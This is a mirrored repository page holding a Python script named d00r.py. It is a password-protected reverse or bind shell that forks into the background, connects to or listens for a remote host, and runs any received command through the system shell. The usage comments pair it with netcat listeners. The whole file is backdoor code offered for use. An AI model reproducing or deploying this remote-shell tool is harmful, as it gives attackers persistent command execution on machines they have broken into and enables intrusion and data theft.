mirror of
https://github.com/tennc/webshell
synced 2024-11-23 03:33:03 +00:00
135 lines
3.2 KiB
Python
135 lines
3.2 KiB
Python
#!/usr/bin/env python3
|
|
|
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
|
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
|
|
# #
|
|
# alpha #
|
|
# #
|
|
# Reviewed By:tennc #
|
|
# date:2014-03-12 #
|
|
# run with python3 #
|
|
# #
|
|
# usage: #
|
|
# % ./d00r_py3 -b password port #
|
|
# % ./d00r_py3 -r password port host #
|
|
# % nc host port #
|
|
# % nc -l -p port (please use netcat) #
|
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
|
|
|
|
|
import os, sys, socket, time
|
|
|
|
|
|
# =================== var =======
|
|
MAX_LEN=1024
|
|
SHELL="/bin/zsh -c"
|
|
TIME_OUT=300 #s
|
|
PW=""
|
|
PORT=""
|
|
HOST=""
|
|
|
|
|
|
# =================== funct =====
|
|
# shell - exec command, return stdout, stderr; improvable
|
|
def shell(cmd):
|
|
sh_out = os.popen(SHELL + " " + cmd).readlines()
|
|
nsh_out = ""
|
|
for i in range(len(sh_out)):
|
|
nsh_out += sh_out[i]
|
|
return nsh_out
|
|
|
|
# action?
|
|
def action(conn):
|
|
conn.send("\nPass?\n")
|
|
try:
|
|
pw_in = conn.recv(len(PW))
|
|
except:
|
|
print("timeout")
|
|
else:
|
|
if pw_in == PW:
|
|
conn.send("joo are on air!\n")
|
|
while True:
|
|
conn.send(">>> ")
|
|
try:
|
|
pcmd = conn.recv(MAX_LEN)
|
|
except:
|
|
print("timeout")
|
|
return True
|
|
else:
|
|
#print("pcmd:",pcmd)
|
|
cmd = "" #pcmd
|
|
for i in range(len(pcmd) - 1):
|
|
cmd += pcmd[i]
|
|
if cmd == ":dc":
|
|
return True
|
|
elif cmd == ":sd":
|
|
return False
|
|
else:
|
|
if len(cmd) > 0:
|
|
out = shell(cmd)
|
|
conn.send(out)
|
|
# =================== main ======
|
|
argv = sys.argv
|
|
|
|
if len(argv) < 4:
|
|
print("usage:")
|
|
print("% ./d00r_py3 -b password port")
|
|
print("% ./d00r_py3 -r password port host")
|
|
print("% nc host port")
|
|
print("% nc -l -p port (please use netcat)")
|
|
sys.exit(1)
|
|
elif argv[1] == "-b":
|
|
PW = argv[2]
|
|
PORT = argv[3]
|
|
elif argv[1] == "-r" and len(argv) > 4:
|
|
PW = argv[2]
|
|
PORT = argv[3]
|
|
HOST = argv[4]
|
|
else:
|
|
exit(1)
|
|
|
|
PORT = int(PORT)
|
|
print("PW:",PW,"PORT:",PORT,"HOST:",HOST)
|
|
|
|
#sys.argv[0] = "d00r_py3"
|
|
|
|
#exit ffather proc
|
|
|
|
if os.fork()!= 0:
|
|
sys.exit(0)
|
|
|
|
#associate the socket
|
|
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
|
sock.settimeout(TIME_OUT)
|
|
|
|
if argv[1] == "-b":
|
|
sock.bind(("localhost",PORT))
|
|
sock.listen(0)
|
|
|
|
run = True
|
|
while run:
|
|
if argv[1] == "-r":
|
|
try:
|
|
sock.connect((HOST,PORT))
|
|
except:
|
|
print("host unreachable")
|
|
time.sleep(5)
|
|
else:
|
|
run = action(sock)
|
|
else:
|
|
try:
|
|
(conn,addr) = sock.accept()
|
|
except:
|
|
print("timeout")
|
|
time.sleep(1)
|
|
else:
|
|
run = action(conn)
|
|
if argv[1] == "-b" :
|
|
conn.shutdown(2)
|
|
else:
|
|
try:
|
|
sock.send("")
|
|
except:
|
|
time.sleep(1)
|
|
else:
|
|
sock.shutdown(2)
|